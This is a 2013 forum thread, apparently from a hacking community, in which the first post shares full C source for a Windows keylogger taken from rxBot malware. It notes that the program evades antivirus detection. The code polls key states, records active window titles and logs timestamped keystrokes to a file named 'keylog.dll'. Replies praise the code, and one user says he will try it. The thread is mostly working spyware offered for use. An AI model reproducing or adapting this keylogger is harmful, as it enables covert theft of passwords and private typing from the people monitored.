Author Topic: keylogger from rxBot  (Read 1922 times)

0 Members and 1 Guest are viewing this topic.

xC

  • Guest
keylogger from rxBot
« on: April 21, 2013, 04:36:14 am »
Found this in an old rxBot source, 0 detections from VirusTotal as a stand-alone application.

Code: (c) [Select]
#include <windows.h>
#include <stdio.h>


typedef struct KEYS
{
int inputL;
char outputL[7];
char outputH[7];


} KEYS;


KEYS keys[]={
{8,"b","b"},
{13,"e","e"},
{27,"[ESC]","[ESC]"},
{112,"[F1]","[F1]"},
{113,"[F2]","[F2]"},
{114,"[F3]","[F3]"},
{115,"[F4]","[F4]"},
{116,"[F5]","[F5]"},
{117,"[F6]","[F6]"},
{118,"[F7]","[F7]"},
{119,"[F8]","[F8]"},
{120,"[F9]","[F9]"},
{121,"[F10]","[F10]"},
{122,"[F11]","[F11]"},
{123,"[F12]","[F12]"},
{192,"`","~"},
{49,"1","!"},
{50,"2","@"},
{51,"3","#"},
{52,"4","$"},
{53,"5","%"},
{54,"6","^"},
{55,"7","&"},
{56,"8","*"},
{57,"9","("},
{48,"0",")"},
{189,"-","_"},
{187,"=","+"},
{9,"[TAB]","[TAB]"},
{81,"q","Q"},
{87,"w","W"},
{69,"e","E"},
{82,"r","R"},
{84,"t","T"},
{89,"y","Y"},
{85,"u","U"},
{73,"i","I"},
{79,"o","O"},
{80,"p","P"},
{219,"[","{"},
{221,"","}"},
{65,"a","a"},
{83,"s","S"},
{68,"d","D"},
{70,"f","F"},
{71,"g","G"},
{72,"h","H"},
{74,"j","J"},
{75,"k","K"},
{76,"l","L"},
{186,";",":"},
{222,"'","\""},
{90,"z","Z"},
{88,"x","X"},
{67,"c","C"},
{86,"v","V"},
{66,"b","B"},
{78,"n","N"},
{77,"m","M"},
{188,",","<"},
{190,".",">"},
{191,"/",".?"},
{220,"\\","|"},
{17,"[CTRL]","[CTRL]"},
{91,"[WIN]","[WIN]"},
{32," "," "},
{92,"[WIN]","[WIN]"},
{44,"[PRSC]","[PRSC]"},
{145,"[SCLK]","[SCLK]"},
{45,"[INS]","[INS]"},
{36,"[HOME]","[HOME]"},
{33,"[PGUP]","[PGUP]"},
{46,"[DEL]","[DEL]"},
{35,"[END]","[END]"},
{34,"[PGDN]","[PGDN]"},
{37,"[LEFT]","[LEFT]"},
{38,"[UP]","[UP]"},
{39,"[RGHT]","[RGHT]"},
{40,"[DOWN]","[DOWN]"},
{144,"[NMLK]","[NMLK]"},
{111,"/","/"},
{106,"*","*"},
{109,"-","-"},
{107,"+","+"},
{96,"0","0"},
{97,"1","1"},
{98,"2","2"},
{99,"3","3"},
{100,"4","4"},
{101,"5","5"},
{102,"6","6"},
{103,"7","7"},
{104,"8","8"},
{105,"9","9"},
{110,".","."}
};


int SaveKeys(char *szKey)
{
char* szFile = "keylog.dll";


SYSTEMTIME sTime;
GetLocalTime( &sTime );


FILE *fp = fopen( szFile,"ab");
if (fp == NULL) {
     return 1;
        }
fprintf(fp, "[%d-%d-%d %d:%d:%d] %s\r\n", sTime.wMonth, sTime.wDay, sTime.wYear, sTime.wHour, sTime.wMinute, sTime.wSecond, szKey);
fclose(fp);


return 0;
}


int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
char buffer[260], buffer2[260], windowtxt[260];

int err = 0, x = 0, i = 0, state, shift, bKstate[256]={0};


HWND active = GetForegroundWindow();
HWND old = active;
GetWindowText(old,windowtxt,60);


while (err == 0) {
Sleep(8);


active = GetForegroundWindow();
if (active != old) {
old = active;
GetWindowText(old,windowtxt,60);


sprintf(buffer2, "%s (Changed Windows: %s)", buffer, windowtxt);
err = SaveKeys(buffer2);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));
}


for (i = 0; i < 92; i++) {
shift = GetKeyState(VK_SHIFT);


x = keys[i].inputL;


if (GetAsyncKeyState(x) & 0x8000) {
if (((GetKeyState(VK_CAPITAL)) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
bKstate[x] = 1; /* upercase a-z */
else if (((GetKeyState(VK_CAPITAL)) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
bKstate[x] = 2; /* lowercase a-z */
else if (shift < 0) /* shift */
bKstate[x] = 3; /* uppercase */
else bKstate[x] = 4; /* lowercase */
} else {
if (bKstate[x] != 0) {
state = bKstate[x];
bKstate[x] = 0;

if (x == 8) {
buffer[strlen(buffer)-1] = 0;
continue;
} else if (strlen(buffer) > 511 - 70) {
active = GetForegroundWindow();
GetWindowText(active,windowtxt,60);

sprintf(buffer2,"%s (Buffer full) (%s)",buffer,windowtxt);
err = SaveKeys(buffer2);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));


continue;
} else if (x == 13) {
if (strlen(buffer) == 0)
continue;


active = GetForegroundWindow();
GetWindowText(active,windowtxt,60);


sprintf(buffer2,"%s (Return) (%s)",buffer,windowtxt);
err = SaveKeys(buffer2);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));


continue;
} else if (state == 1 || state == 3)
strcat(buffer,keys[i].outputH);
else if (state == 2 || state == 4)
strcat(buffer,keys[i].outputL);
}
}
}
}
return( 0 );}
« Last Edit: April 22, 2013, 06:26:45 pm by Kulverstukas »

Offline static_cast

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: keylogger from rxBot
« Reply #1 on: April 22, 2013, 04:00:48 am »
Very nice source, but it's actually C, not C++.  [Not sure if you knew that already, though...]

Thanks! :)

xC

  • Guest
Re: keylogger from rxBot
« Reply #2 on: April 22, 2013, 03:21:29 pm »
Thanks for the comment, and I just tagged it as code. Whoever edited and put C++ was making the mistake. Lol.

Offline #rak3r

  • NULL
  • Posts: 3
  • Cookies: 0
    • View Profile
Re: keylogger from rxBot
« Reply #3 on: April 29, 2013, 03:24:36 pm »
i must try this one :D